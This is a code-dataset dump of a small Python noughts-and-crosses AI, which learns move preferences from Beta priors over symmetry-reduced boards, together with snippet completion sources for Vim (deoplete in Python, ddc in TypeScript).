newCalculation.multiply())\n\n# Scientific inherits from Calculator\nprint('a*b: %d' % newPower.multiply())\nprint('a+b: %d' % newPower.add())\nprint('a pow b: %d' % newPower.power())\n\n# globvar = 0\n#\n#\n# def set_globvar_to_one():\n#\n# # global globvar # Needed to modify global copy of globvar\n# globvar = 1\n#\n#\n# def print_globvar():\n#\n# print(globvar) # No need for global declaration to read value of globvar\n#\n# set_globvar_to_one()\n# print_globvar()\n" }, { "alpha_fraction": 0.7272727489471436, "alphanum_fraction": 0.7575757503509521, "avg_line_length": 21.33333396911621, "blob_id": "25b1fd1cb6cf1f6a70dff59e804b7fef49220f25", "content_id": "be4b7b28f43057c43016ffc073f8d472ff4a71fb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 66, "license_type": "no_license", "max_line_length": 42, "num_lines": 3, "path": "/python/Module-1/pkgdemo/__init__.py", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "__author__ = 'ma11ock'\n\nfrom classes import Calculator, Scientific" }, { "alpha_fraction": 0.6404958963394165, 
"alphanum_fraction": 0.64462810754776, "avg_line_length": 17.615385055541992, "blob_id": "83a5cf46e4c8c3c557b1b94a2844d30450f443c8", "content_id": "f5b619c067701d47fe8ee4d67a9a870016b07625", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 242, "license_type": "no_license", "max_line_length": 38, "num_lines": 13, "path": "/python/mock/dumpmodules.py", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport sys,pefile\n\nprint \"./script path/to/file\"\n\n# not pretty just has to work!\nfile=sys.argv[1]\npe=pefile.PE(file)\n\nprint '[+] Imported DLLs [+]'\nfor dlls in pe.DIRECTORY_ENTRY_IMPORT:\n print '[+] ' , dlls.dll, ' [+]'\n" }, { "alpha_fraction": 0.5122448801994324, "alphanum_fraction": 0.5163265466690063, "avg_line_length": 20.30434799194336, "blob_id": "9a82b1de003f5839d07ff9d5324e1bc8b95dab5d", "content_id": "98f7cccd5d13ba5daba1af2449d691526e77f09d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1470, "license_type": "no_license", "max_line_length": 70, "num_lines": 69, "path": "/python/Module-2/directory.py", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "__author__ = 'ma11ock'\n\nimport glob\nimport os\nimport sys\n\n\n# print(os.getcwd())\n#os.mkdir(\"newdir\")\n#os.rmdir() - removes empty dir\n#os.remove() - removes file\n#shutil.rmtree() - removes dir & contents\n# print(os.listdir(\".\"))\n#\n# for item in os.listdir(\".\"):\n# if os.path.isfile(item):\n# print(item + \" is a file\")\n# elif os.path.isdir(item):\n# print(item + \" is a directory\")\n# else:\n# print(\"unknown\")\n\n\n#glob not great for large files\n# for item in glob.glob(os.path.join(\".\", \"*.py\")):\n# print(item)\n\nprint()\nprint()\n\nfor dirpath, dirs, files in os.walk(\".\"):\n path = dirpath.split('/')\n print('|', (len(path))*'---', '[', os.path.basename(dirpath), ']')\n for dir in dirs:\n directory = dir\n\n for f in files:\n cwd = path\n # print(path)\n # if dirs empty append ..if dirs = dirs append\n if path is not None:\n # need to distinguish dir from file\n if path != cwd:\n path.append(f)\n print('|', (len(path))*'---', '[', f, ']')\n\n\nprint()\nprint()\n\ntry:\n sys.argv[1]\nexcept:\n path = os.getcwd()\nelse:\n path = sys.argv[1]\n\n\ndef listdir(dir=path, depth=1):\n\n for f in glob.glob(os.path.join(dir + \"/*\")):\n if os.path.isdir(f):\n print(depth*\"----\" + \" [\" + f.split(\"/\").pop() + \"]\")\n listdir(f, depth+1)\n else:\n print(depth*\"----\" + \" [\" + f.split(\"/\").pop() + \"]\")\n\nprint(path)\nlistdir()\n" }, { "alpha_fraction": 0.5670611262321472, "alphanum_fraction": 0.5808678269386292, "avg_line_length": 27.13888931274414, "blob_id": "ff778e039ed62c3304fa334c469f592698fd711c", "content_id": "ddc9c1229aa74f3ae9b4afc442a7d23a6b609992", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1014, "license_type": "no_license", "max_line_length": 99, "num_lines": 36, "path": "/FaX/tcpserver.py", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n__author__ = 'ma11ock'\n\nimport SocketServer,socket,errno\n\n# EchoHandler - handle all clients connecting to server, could be fuzzer, could be data capture etc\n\nclass EchoHandler(SocketServer.BaseRequestHandler):\n\n def handle(self):\n print(\"client is: \", self.client_address)\n data = 'dummy'\n\n try:\n while len(data):\n data = self.request.recv(1024)\n 
print(\"client sent: \", data)\n fdesc = open(\"C:\\\\fuzzer\\\\log\\\\log.txt\",\"a\")\n fdesc.write(data)\n self.request.send(data)\n except socket.error as error:\n if error.errno == errno.WSAECONNRESET:\n print(\"i'm breaking here\")\n else:\n raise\n \n print(\"client left\")\n\n\ntry:\n\tserverAddr = (\"0.0.0.0\",9000)\n\tserver = SocketServer.TCPServer(serverAddr,EchoHandler)\n\tserver.serve_forever()\n\tprint \"[+] log server connected\"\nexcept socket.error:\n\tprint \"[+] log server is up\"\n\n" }, { "alpha_fraction": 0.6331658363342285, "alphanum_fraction": 0.6566163897514343, "avg_line_length": 25, "blob_id": "f0364940136ab1567df9b1709ac38145547fb7d5", "content_id": "0e37a5edc3d190397e18e1f12572c02c76032edd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 597, "license_type": "no_license", "max_line_length": 99, "num_lines": 23, "path": "/python/Module-3/tcpserver.py", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n__author__ = 'ma11ock'\n\nimport SocketServer\n\n# EchoHandler - handle all clients connecting to server, could be fuzzer, could be data capture etc\n\nclass EchoHandler(SocketServer.BaseRequestHandler):\n\n def handle(self):\n print(\"client is: \", self.client_address)\n data = 'dummy'\n\n while len(data):\n data = self.request.recv(1024)\n print(\"client sent: \", data)\n self.request.send(data)\n\n print(\"client left\")\n\nserverAddr = (\"0.0.0.0\",9000)\nserver = SocketServer.TCPServer(serverAddr,EchoHandler)\nserver.serve_forever()" }, { "alpha_fraction": 0.6274319291114807, "alphanum_fraction": 0.6410505771636963, "avg_line_length": 22.363636016845703, "blob_id": "76758f91a1ba1079f0b8de1845648cd360794666", "content_id": "3d6261f9bd5f5f0af4fce7c57fd553dde8b36e5a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 1028, "license_type": "no_license", "max_line_length": 85, "num_lines": 44, "path": "/ruby/pcap2json.rb", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "require 'JSON'\nrequire 'cobravsmongoose'\nrequire 'awesome_print'\nrequire 'nokogiri'\n\nif ARGV[0] == \"-h\" || ARGV[0] == \"--help\" || ARGV[0] == nil\n puts \" | ruby pcap2json.rb INPUT OUTPUT\"\n puts \" | ruby pcap2json.rb /Users/BOB/Desktop/pcap.pcapng /Users/BOB/Desktop/json\"\n exit\nelse\n #change ARGV[1] to xml to convert to json\n `tshark -r \"#{ARGV[0]}\" -T pdml > xml`\nend\n\n# 1 method\nxml = File.open(\"xml\").read\n#json = CobraVsMongoose.xml_to_json(xml)\n#pretty_json = JSON.pretty_generate(JSON.parse json)\n#output = ap pretty_json\nFile.open(\"#{ARGV[1]}\", \"w\") { |file| file.write(xml) }\n\n\n# 2 method\n#File.foreach(\"xml\") do |xml|\n # json = CobraVsMongoose.xml_to_json(xml)\n #File.open(\"#{ARGV[1]}\",\"a\"){|file|file.write(json)}\n#end\n\n# 3 method\n#xml = []\n#File.foreach(\"xml\"){|line|xml << line}\n\n#xml = xml.join\n#json = CobraVsMongoose.xml_to_json(xml)\n#File.open(\"#{ARGV[1]}\",\"a\"){|file|file.write(json)}\n\n#`rm xml`\n\n#f = File.open(\"#{ARGV[1]}\")\n#doc = Nokogiri::XML(f)\n\n#puts doc.xpath('//proto/name/@showname')\n\n#f.close\n" }, { "alpha_fraction": 0.5855262875556946, "alphanum_fraction": 0.625, "avg_line_length": 15.777777671813965, "blob_id": "20e6654a9fd261c489615d803ced529be6249937", "content_id": "fa71d02c77b26d00dcf07a5a38f2b2bf65c2d999", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 152, "license_type": 
"no_license", "max_line_length": 51, "num_lines": 9, "path": "/python/Module-1/modules.py", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "__author__ = 'ma11ock'\n\nimport classes\n\nprint('Quick Add a+b: %d' % classes.quick_add(3,4))\n\nins = classes.Scientific(5, 6)\n\nprint('%d' % ins.power())\n\n" }, { "alpha_fraction": 0.6774193644523621, "alphanum_fraction": 0.7096773982048035, "avg_line_length": 27.714284896850586, "blob_id": "417ba2fa643b4762858c03c7d2445c07bb85630d", "content_id": "174cea1a93f7fa9b79ef7a974a32c5ed12a91c22", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 403, "license_type": "no_license", "max_line_length": 58, "num_lines": 14, "path": "/python/Module-3/arprequest.py", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n__author__ = 'ma11ock'\n\nfrom scapy.all import Ether,IP,TCP,sr1\n\n# just showing a send receive layer 3 scapy request\npkt = sr(IP(dst=\"127.0.0.1\")/ARP()/\"XXX\")\n# pkt = (response, unanswered)\n# breaks up our pkt into a response and unanswered section\nresponse, no_response = _\n# gives our full results\nresponse[0]\n# this gives us our results with the IP packet\nresponse[0][1].show()\n\n" } ]
47
nikolaimerritt/NoughtsAndCrossesML
https://github.com/nikolaimerritt/NoughtsAndCrossesML
067bfaaf9effba56038be7e3a27b3be367d95bc2
2a5fd89753badecc8602a69b9095980d256c14bb
d0da94099e045a75c0954730afdd60132fbdc34d
refs/heads/master
2022-11-16T12:46:50.430534
2020-06-23T10:59:06
2020-06-23T10:59:06
272,956,153
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5451072454452515, "alphanum_fraction": 0.5595062971115112, "avg_line_length": 30.229358673095703, "blob_id": "1ece231a8ea852d0eab42edd91de9b5d2123b826", "content_id": "228049dafd945bfad7866beca3cfbf949ad030a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3403, "license_type": "no_license", "max_line_length": 143, "num_lines": 109, "path": "/host.py", "repo_name": "nikolaimerritt/NoughtsAndCrossesML", "src_encoding": "UTF-8", "text": "import random, time, os\nfrom mathsyStuff import cellNumberToCoord, elSuchThat\nfrom board import Board, cellNumberToCoord\nfrom ai import Learner\n\nai = Learner()\n\nclass Player:\n ai = 0\n human = 1\n random = 2\n def __init__(self, nature, name, id):\n self.nature = nature \n self.name = name \n self.id = id\n \n def __str__(self):\n natureString = \"(Human)\" if self.nature == Player.human else \"(AI)\"\n return self.name + \" (\" + Board.idToSymbol[self.id] + \") \" + natureString\n\ndef moveChoice(player, board, verbose):\n if player.nature == Player.ai:\n if verbose:\n os.system(\"clear\")\n print(\"\\n\\n\\n\")\n board.print()\n print(str(player), \"is thinking...\")\n time.sleep(1)\n ai.printUncertainties(board, player.id)\n time.sleep(3.5)\n print(\"\\n\\n\")\n return ai.choosePosition(board, player.id)\n elif player.nature == Player.random:\n return random.choice(board.availableCells())\n elif player.nature == Player.human:\n board.print()\n coord = None\n while coord == None or coord not in board.availableCoords():\n cellNumber = int(input(\"\\n{0} Where would you like to move?\\t\".format(player))) - 1\n coord = cellNumberToCoord(cellNumber)\n return coord\n\ndef winners(player1, player2, verbose = False):\n \"\"\"\n player1 plays first. assume player1.id == 1, player2.id == 2\n \"\"\"\n board = Board()\n while True:\n for player in [player1, player2]:\n board.makeMove(moveChoice(player, board, verbose), player.id)\n if board.isWinningBoard():\n if verbose:\n board.print()\n return [player.id]\n elif board.isFull():\n if verbose:\n board.print()\n return [1, 2]\n\ndef playAIvsAI():\n player1 = Player(Player.ai, \"Nick\", 1)\n player2 = Player(Player.ai, \"James\", 2)\n winners(player1, player2)\n\n gamesPlayed = 0\n while ai.amountOfData < ai.whenToStop:\n ai.learnAfterGame(winners(player1, player2))\n gamesPlayed += 1\n if (gamesPlayed + 1) % Learner.saveInterval == 0:\n ai.writeData()\n \ndef playAIvsPlayer(verbose = True):\n ai.whenToPlaySmart = 0\n if verbose:\n os.system(\"clear\")\n print(\"\\n\\n\\nPositions are numbered 1 to 9, starting at the top left and going across. \\nE.g. if you wanted to go to the (x) position\")\n Board([\n [0, 0, 0],\n [1, 0, 0],\n [0, 0, 0]\n ]).print()\n print(\"you'd type in 4 when asked.\\n\\n\")\n time.sleep(5)\n\n humanPlayer = Player(\n Player.human, \n input(\"What would you like to be called?\\t\"), \n 1 if \"y\" in input(\"Would you like to go first?\\t\").lower() else 2\n )\n\n if verbose:\n os.system(\"clear\")\n print(\"\\n\\n\\n\")\n\n aiPlayer = Player(Player.ai, \"Bayes\", 3 - humanPlayer.id)\n players = [humanPlayer, aiPlayer]\n players.sort(key = lambda p: p.id)\n\n wins = winners(*players, verbose)\n if verbose:\n if len(wins) == 2:\n print(\"It's a tie :/\")\n else:\n winner = elSuchThat(players, lambda p: p.id in wins)\n print(str(winner), \"has won!\")\n\nplayAIvsPlayer()\nwhile \"n\" not in input(\"Go again? 
\\t\").lower():\n playAIvsPlayer()" }, { "alpha_fraction": 0.6679462790489197, "alphanum_fraction": 0.6967370510101318, "avg_line_length": 44.34782791137695, "blob_id": "575b4f179bfdf691be280c8194cc69b5f101c5d0", "content_id": "7c1396b5bc8fbdae1db07ecc58ba6b77d8067a45", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1042, "license_type": "no_license", "max_line_length": 107, "num_lines": 23, "path": "/standardiser.py", "repo_name": "nikolaimerritt/NoughtsAndCrossesML", "src_encoding": "UTF-8", "text": "from mathsyStuff import Transformation\nfrom board import Board\n\n\"\"\"\n - a position on the board is modelled by a row vector, with the origin at the board's centre\n - there are 16 transformations on a board which preserve the boards layout (rotations, reflections, etc),\n since there are 8 different ways an arrow (--->) along the board's top edge can end up,\n and each can be composed with a swap of the players' symbols\n - these form a group\n - rotations by 0, 90, 180 and 270, a reflection by 45, the identity, and a piece swap,\n belong to this group, so their compositions (which are 16 elements) \n make up the group\n\"\"\"\ndef standardTransformation(board, playerID):\n swap = playerID != 1\n minTrans = Transformation.identity()\n\n for angle in [0, 90, 180, 270]:\n for reflectBy45 in [True, False]:\n trans = Transformation.fromProperties(angle, reflectBy45, swap)\n if trans.onBoard(board).encoding() < minTrans.onBoard(board).encoding():\n minTrans = trans\n return minTrans" }, { "alpha_fraction": 0.8160919547080994, "alphanum_fraction": 0.8160919547080994, "avg_line_length": 42.5, "blob_id": "45a0b174a18d27017b20f517c96f56b519cec98f", "content_id": "982fe6ba325de71b5c5a872f02e453d4b5cea8a8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 87, "license_type": "no_license", "max_line_length": 64, "num_lines": 2, "path": "/README.md", "repo_name": "nikolaimerritt/NoughtsAndCrossesML", "src_encoding": "UTF-8", "text": "# NoughtsAndCrossesML\nVery basic noughts and crosses (tic-tac-toe) machine learning AI\n" }, { "alpha_fraction": 0.4885479211807251, "alphanum_fraction": 0.5094507336616516, "avg_line_length": 26.5950927734375, "blob_id": "de2991fbac032a28343427ee077b1227d048c40a", "content_id": "2401037fc17a98a0e78aadb7a08d727dd46218b4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4497, "license_type": "no_license", "max_line_length": 116, "num_lines": 163, "path": "/mathsyStuff.py", "repo_name": "nikolaimerritt/NoughtsAndCrossesML", "src_encoding": "UTF-8", "text": "from board import *\n\nclass SquareMatrix:\n @classmethod\n def identity(cls, dimemsion = 2):\n \"\"\"\n only bothering for 2x2 case\n \"\"\"\n return cls([\n [1, 0],\n [0, 1]\n ])\n\n @classmethod\n def dot(cls, vect1, vect2):\n return sum([vect1[i] * vect2[i] for i in range(len(vect1))])\n\n def __init__(self, rows):\n self.rows = rows\n self.dim = len(self.rows)\n \n def __str__(self):\n string = \"\"\n for row in self.rows:\n for x in row:\n string += str(x) + \"\\t\"\n string += \"\\n\"\n return string\n \n def row(self, r):\n return self.rows[r]\n \n def col(self, c):\n return [self.rows[r][c] for r in range(self.dim)]\n \n def __rmul__(self, scalar):\n return SquareMatrix([\n [scalar * self.rows[r][c] for c in range(self.dim)]\n for r in range(self.dim)\n ])\n \n def __matmul__(self, other):\n if type(other) == SquareMatrix:\n return 
self.actOnMatrix(other)\n else:\n return self.actOnVector(other)\n \n def actOnVector(self, vector):\n return [SquareMatrix.dot(self.row(r), vector) for r in range(self.dim)]\n \n def transpose(self):\n return SquareMatrix([\n [self.rows[c][r] for c in range(self.dim)] \n for r in range(self.dim)\n ])\n\n def actOnMatrix(self, matrix):\n return SquareMatrix([\n self.actOnVector(matrix.col(c)) for c in range(matrix.dim)\n ]).transpose()\n \n def det(self):\n \"\"\"\n case of 2x2 matrix\n \"\"\"\n return self.rows[0][0] * self.rows[1][1] - self.rows[0][1] * self.rows[1][0]\n\n def inverse(self):\n \"\"\"\n case of 2x2 matrix\n \"\"\"\n if self.det() == 0:\n raise ValueError(\"Trying to find the inverse of {0}, which does not exist\".format(str(self)))\n return 1 / 0\n else:\n invDet = 1 / self.det()\n if 1 / self.det() == int(1/self.det()):\n invDet = int(invDet)\n \n return invDet * SquareMatrix([\n [self.rows[1][1], -self.rows[0][1]],\n [-self.rows[1][0], self.rows[0][0]]\n ])\n\nclass Transformation:\n @classmethod\n def integerSin(cls, multOf90):\n \"\"\"\n returns only 0, 1, 0, -1, ...\n \"\"\"\n k = int(multOf90 / 90)\n return 0 if k % 2 == 0 else (-1) ** int((k - 1) / 2)\n\n @classmethod\n def integerCos(cls, multOf90):\n \"\"\"\n returns only 1, 0, -1, 0, ...\n \"\"\"\n k = int(multOf90 / 90)\n return 0 if k % 2 != 0 else (-1) ** int(k / 2)\n\n reflect45 = SquareMatrix([\n [0, 1],\n [1, 0]\n ])\n \n @classmethod\n def rotationMatrix(cls, angle):\n c = cls.integerCos(angle)\n s = cls.integerSin(angle)\n return SquareMatrix([\n [c, -s], \n [s, c]\n ])\n \n @classmethod\n def swapPlayerIdx(cls, num):\n if num == 2:\n return 1\n if num == 1:\n return 2\n return num\n \n @classmethod\n def identity(cls):\n return cls.fromProperties(0, False, False)\n \n @classmethod\n def fromProperties(cls, rotationAngle, reflect, swap):\n matrix = cls.reflect45 @ cls.rotationMatrix(rotationAngle) if reflect else cls.rotationMatrix(rotationAngle)\n return cls(matrix, swap)\n\n def __init__(self, matrix, swap):\n self.matrix = matrix\n self.swap = swap\n \n def onCoord(self, coord):\n \"\"\"\n Note that this has no way to swap pieces\n \"\"\"\n return self.matrix @ coord\n\n def onBoard(self, board):\n newBoard = Board()\n for y in [1, 0, -1]:\n for x in [-1, 0, 1]:\n pieceAtxy = board.atCoord((x, y))\n imgCoord = self.onCoord((x, y))\n if pieceAtxy != 0:\n newBoard.makeMove(imgCoord, pieceAtxy)\n return newBoard\n \n def inverse(self):\n return Transformation(self.matrix.inverse(), self.swap)\n\ndef pad(num, digits):\n numAsString = str(float(num))\n amountOfZeroes = max(digits - len(numAsString.replace(\".\", \"\")), 0)\n return numAsString[0 : digits] + \"0\" * amountOfZeroes\n\ndef elSuchThat(list, condition):\n elsThatMatchCondition = [x for x in list if condition(x)]\n return elsThatMatchCondition[0] if elsThatMatchCondition else None" }, { "alpha_fraction": 0.5446159839630127, "alphanum_fraction": 0.553463876247406, "avg_line_length": 32.41509246826172, "blob_id": "297e7c853e8ce4f412b8f172c04f7984cbe14563", "content_id": "21b175f0915e16f79306a7d3ec2e4cd0bd3a40de", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5312, "license_type": "no_license", "max_line_length": 109, "num_lines": 159, "path": "/ai.py", "repo_name": "nikolaimerritt/NoughtsAndCrossesML", "src_encoding": "UTF-8", "text": "from util import before, after, between\nimport random, math\nfrom mathsyStuff import pad, elSuchThat\nfrom standardiser import 
standardTransformation\n\n\nclass Choice:\n def __init__(self, encodingBeforeMove, priorChosen, playerID):\n self.encoding = encodingBeforeMove\n self.prior = priorChosen\n self.playerID = playerID\n \n def __str__(self):\n return \"{0} ({1}): {2}\".format(self.encoding, self.playerID, str(self.prior))\n \nclass Prior:\n def __init__(self, alpha, beta, coord):\n self.alpha = alpha\n self.beta = beta\n self.coord = coord\n \n @classmethod\n def fromString(cls, string):\n alpha, beta = [float(x) for x in before(string, \" (\").split(\", \")]\n coord = [int(x) for x in between(string, \" (\", \")\").split(\", \")]\n \n return cls(alpha, beta, coord)\n\n def __str__(self):\n return \"{0}, {1} ({2}, {3})\".format(\n self.alpha,\n self.beta,\n self.coord[0],\n self.coord[1]\n )\n \n def mean(self):\n return self.alpha / (self.alpha + self.beta)\n \n def update(self, datum):\n return Prior(self.alpha + datum, self.beta + 1 - datum, self.coord)\n\n def __eq__(self, other):\n if type(other) != Prior:\n return False\n return self.alpha == other.alpha and self.beta == other.beta and self.coord == other.coord\n\nclass Learner:\n possibleStdBoards = int((3 ** 9) / 8)\n whenToPlaySmart = 20 * possibleStdBoards\n whenToStop = 60 * possibleStdBoards\n saveInterval = 100\n priorsFile = \"priors.txt\"\n\n def __init__(self):\n self.encodingToPriors = self.readPriors()\n self.amountOfData = self.readAmountOfData()\n self.movesMade = []\n\n def readAmountOfData(self):\n \"\"\"\n amount of data is in first line\n \"\"\"\n with open(Learner.priorsFile, \"r\") as f:\n return int(f.readline())\n\n def readPriors(self):\n \"\"\"\n first line is amount of data, so is ignored\n\n lines are of format\n 13072: <prior>; <prior>; <prior>\n \"\"\"\n encodingToPriors = {}\n with open(Learner.priorsFile, \"r\") as f:\n for line in f.readlines()[1 : ]:\n encoding = int(before(line, \": \"))\n priorsBit = after(line, \": \")\n encodingToPriors[encoding] = [Prior.fromString(bit) for bit in priorsBit.split(\"; \")]\n return encodingToPriors\n \n def priorsToString(self):\n string = \"\"\n for encoding, priors in self.encodingToPriors.items():\n string += str(encoding) + \": \"\n \n for i in range(len(priors)):\n string += str(priors[i])\n if i + 1 < len(priors):\n string += \"; \"\n string += \"\\n\"\n\n return string \n \n def writeData(self):\n with open(Learner.priorsFile, \"w\") as f:\n f.write(str(self.amountOfData) + \"\\n\")\n f.write(self.priorsToString())\n\n def choosePosition(self, board, playerID):\n \"\"\"\n board \n |--(matrix)--> stdBoard \n |--(choose best prior)--> stdPos\n |--(matrix^-1)--> pos \n \"\"\"\n\n transToStd = standardTransformation(board, playerID)\n stdBoard = transToStd.onBoard(board)\n prior = self.choosePrior(stdBoard)\n self.movesMade.append(Choice(stdBoard.encoding(), prior, playerID))\n pos = transToStd.inverse().onCoord(prior.coord)\n return pos\n \n def choosePrior(self, stdBoard):\n encoding = stdBoard.encoding()\n\n if encoding not in self.encodingToPriors.keys():\n self.setUnbiasedPriors(stdBoard)\n\n if self.amountOfData < self.whenToPlaySmart:\n return random.choice(self.encodingToPriors[encoding])\n else:\n return self.bestPrior(self.encodingToPriors[encoding]) \n \n def setUnbiasedPriors(self, board):\n priors = [Prior(0.5, 0.5, coord) for coord in board.availableCoords()]\n self.encodingToPriors[board.encoding()] = priors\n\n def bestPrior(self, priors):\n bestPrior = priors[0]\n for prior in priors[1 : ]:\n if prior.mean() > bestPrior.mean():\n bestPrior = prior\n return 
bestPrior\n\n def learnAfterGame(self, winners):\n for choice in self.movesMade:\n datum = 1 if choice.playerID in winners else 0\n\n priors = self.encodingToPriors[choice.encoding]\n idx = priors.index(choice.prior)\n\n self.encodingToPriors[choice.encoding][idx] = priors[idx].update(datum)\n self.amountOfData += 1\n self.movesMade = []\n \n def printUncertainties(self, board, playerID):\n transToStd = standardTransformation(board, playerID)\n stdBoard = transToStd.onBoard(board)\n for y in [1, 0, -1]:\n for x in [-1, 0, 1]:\n stdCoord = transToStd.onCoord((x, y))\n prior = elSuchThat(self.encodingToPriors[stdBoard.encoding()], lambda p: p.coord == stdCoord)\n if prior == None:\n print(\"___\", end = \" \")\n else:\n print(pad(100 * prior.mean(), 2) + \"%\", end = \" \")\n print()" }, { "alpha_fraction": 0.44104626774787903, "alphanum_fraction": 0.4659959673881531, "avg_line_length": 26.021739959716797, "blob_id": "c4961a0ca41fda0a0ea067128c4bb176d1b09ca9", "content_id": "b7e92f64ff72c8de83ff6a07c16ca6581fa6ae5a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2485, "license_type": "no_license", "max_line_length": 94, "num_lines": 92, "path": "/board.py", "repo_name": "nikolaimerritt/NoughtsAndCrossesML", "src_encoding": "UTF-8", "text": "def coordToRowCol(coord):\n \"\"\"\n centre of grid is origin\n \"\"\"\n row = 1 - coord[1]\n col = 1 + coord[0]\n return row, col\n \ndef rowColToCoord(row, col):\n \"\"\"\n centre of grid is origin\n \"\"\"\n x = col - 1\n y = 1 - row\n return (x, y)\n\ndef cellNumberToCoord(n):\n \"\"\"\n returns a number 0, ..., 8 to a coord on a 3x3 board\n \"\"\"\n return rowColToCoord(int(n / 3), n - 3 * int(n / 3))\n\n\ndef emptyGrid():\n return [\n [0, 0, 0],\n [0, 0, 0],\n [0, 0, 0]\n ]\n\nclass Board:\n idToSymbol = {\n 0: \" \",\n 1: \"x\",\n 2: \"o\"\n }\n\n def __init__(self, grid = None):\n self.grid = grid if grid else emptyGrid()\n \n def print(self):\n for r in range(3):\n for c in range(3):\n print(\"|\" + Board.idToSymbol[self.grid[r][c]], end = \"\")\n print(\"|\")\n \n def atCoord(self, coord):\n r, c = coordToRowCol(coord)\n return self.grid[r][c]\n\n def availableCoords(self):\n coords = []\n for r in range(3):\n for c in range(3):\n if self.grid[r][c] == 0:\n coords.append(rowColToCoord(r, c))\n return coords\n\n def isFull(self):\n return self.availableCoords() == []\n\n def isWinningBoard(self):\n # horizontal / vertical win\n for x in range(3):\n # horizontal win\n if self.grid[x][0] != 0 and self.grid[x][0] == self.grid[x][1] == self.grid[x][2]:\n return True \n # vertical win\n if self.grid[0][x] != 0 and self.grid[0][x] == self.grid[1][x] == self.grid[2][x]:\n return True\n # left / right diagonal win\n if self.grid[1][1] != 0:\n # left -> right diagonal win\n if self.grid[0][0] == self.grid[1][1] == self.grid[2][2]:\n return True\n # right -> left diagonal win\n if self.grid[0][2] == self.grid[1][1] == self.grid[2][0]:\n return True\n\n def makeMove(self, coord, playerID):\n r, c = coordToRowCol(coord)\n if self.grid[r][c] != 0:\n raise ValueError(\"Tried to erase someone's move\")\n self.grid[r][c] = playerID\n \n def encoding(self):\n encoding = 0\n for r in range(3):\n for c in range(3):\n exponent = 3 * r + c\n encoding += self.grid[r][c] * (3 ** exponent)\n return encoding" }, { "alpha_fraction": 0.7416666746139526, "alphanum_fraction": 0.75, "avg_line_length": 29.125, "blob_id": "ce9704999cc79ec0b18a72a282d4d98ec1f42381", "content_id": 
"a1105f0c3f0ced980c2abe2996220856e676c730", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 240, "license_type": "no_license", "max_line_length": 58, "num_lines": 8, "path": "/util.py", "repo_name": "nikolaimerritt/NoughtsAndCrossesML", "src_encoding": "UTF-8", "text": "def before(superstring, bit):\n return superstring.split(bit)[0]\n\ndef after(superstring, bit):\n return superstring.split(bit)[1]\n\ndef between(superstring, firstBit, secondBit):\n return after(before(superstring, secondBit), firstBit)" } ]
7
gamoutatsumi/vim-vsnip-integ
https://github.com/gamoutatsumi/vim-vsnip-integ
9d97e9abf437d17bde56c352d306f79daf9029bf
0eee427f96aa11dec031adc104e218775bafc172
a0d74d7ce866a95f8877e50babc0246fef08c2e3
refs/heads/master
2023-08-13T20:19:14.059566
2021-10-02T10:06:44
2021-10-02T10:06:44
414,115,982
0
0
MIT
2021-10-06T07:40:55
2021-10-02T10:06:51
2021-10-02T10:06:48
null
[ { "alpha_fraction": 0.568129301071167, "alphanum_fraction": 0.5796766877174377, "avg_line_length": 26, "blob_id": "c82d584719e8b4d77b3ebd898096bfbb2e6d3688", "content_id": "d173d5f35aff43d282808d51dc0998ed014eb890", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 433, "license_type": "permissive", "max_line_length": 74, "num_lines": 16, "path": "/rplugin/python3/deoplete/source/vsnip.py", "repo_name": "gamoutatsumi/vim-vsnip-integ", "src_encoding": "UTF-8", "text": "import json\nfrom deoplete.source.base import Base\n\nclass Source(Base):\n def __init__(self, vim):\n Base.__init__(self, vim)\n\n self.name = 'vsnip'\n self.mark = '[vsnip]'\n self.rank = 1000\n self.input_pattern = r'\\w\\+$'\n self.min_pattern_length = 1\n self.vars = {}\n\n def gather_candidates(self, context):\n return self.vim.call('vsnip#get_complete_items', context['bufnr'])\n\n" }, { "alpha_fraction": 0.6233009696006775, "alphanum_fraction": 0.6388349533081055, "avg_line_length": 22.409090042114258, "blob_id": "9c2d072f9e7d4c1c8690e5d20b8e814b6e2d10da", "content_id": "48f153b1719911fb38c78ae84f13645a384ceb7d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 515, "license_type": "permissive", "max_line_length": 75, "num_lines": 22, "path": "/denops/@ddc-sources/vsnip.ts", "repo_name": "gamoutatsumi/vim-vsnip-integ", "src_encoding": "UTF-8", "text": "import {\n BaseSource,\n Candidate,\n} from \"https://deno.land/x/[email protected]/types.ts#^\";\nimport { Denops, fn } from \"https://deno.land/x/[email protected]/deps.ts#^\";\n\ntype Params = Record<string, never>;\n\nexport class Source extends 